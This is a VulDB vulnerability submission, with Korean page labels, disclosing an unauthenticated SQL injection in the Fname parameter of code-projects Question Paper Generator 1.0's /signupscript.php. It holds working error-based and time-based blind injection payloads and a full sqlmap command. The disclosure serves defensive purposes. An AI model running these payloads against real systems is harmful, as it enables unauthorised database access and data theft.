제출 #699591: code-projects question paper 1.0 /signupscript.php SQL Injection정보

제목	code-projects question paper 1.0 /signupscript.php SQL Injection
설명	# question-paper-generatorV1.0 – SQL Injection in `/signupscript.php` ## Product Information \| Item \| Details \| \|------\|---------\| \| Affected Product \| question paper generator\| \| Vendor Homepage \| [https://code-projects.org/question-paper-generator-in-php-with-source-code](https://code-projects.org/question-paper-generator-in-php-with-source-code)\| \| Download Link \| [https://code-projects.org/question-paper-generator-in-php-with-source-code/download](https://download.code-projects.org/details/3fcbd9f2-7bfd-4f7a-83e8-9080b80c3c77) \| \| Version \| V1.0 \| \| Vulnerable File \| `/signupscript.php` \| \| Submitter \| yudeshui \| ## Vulnerability Summary \| Field \| Description \| \|-------\|-------------\| \| Vulnerability Type \| SQL Injection \| \| Root Cause \| The `Fname` POST parameter is concatenated directly into the SQL query without sanitization or validation. \| \| Authentication Required \| None – exploitable remotely and anonymously \| \| Impact \| Unauthorized database access, data leakage, alteration or deletion, full system compromise, denial of service \| ## Proof-of-Concept Payloads ``` Parameter: Fname (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: Fname=Test2' AND EXTRACTVALUE(8456,CONCAT(0x5c,0x7176767071,(SELECT (ELT(8456=8456,1))),0x7178707671)) AND 'pkVI'='pkVI&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind Payload: Fname=Test2' RLIKE SLEEP(5) AND 'uGbW'='uGbW&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher ``` ## Quick Verification with sqlmap ```bash sqlmap -u "http://dede:802/signupscript.php" \ --data="Fname=Test2&Lname=User2&contact=2002002002&collg=College2&board=Board2&[email protected]&passwd=pass2&address=TestAddr2&country=Country2&desc=Desc2&type=teacher" \ --level=5 --risk=3 --batch --dbms mysql ``` <img width="1152" height="1095" alt="Image" src="https://github.com/user-attachments/assets/f32f4d16-56ad-43d1-84f1-d9aec605872e" />
원천	⚠️ https://github.com/rassec2/dbcve/issues/6
사용자	yudeshui (UID 91129)
제출	2025. 11. 21. PM 05:14 (5 개월 ago)
모더레이션	2025. 11. 23. AM 10:49 (2 days later)
상태	수락
VulDB 항목	333347 [code-projects Question Paper Generator 1.0 POST Parameter /signupscript.php Fname SQL 주입]
포인트들	20

◂ 이전 개요 다음 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!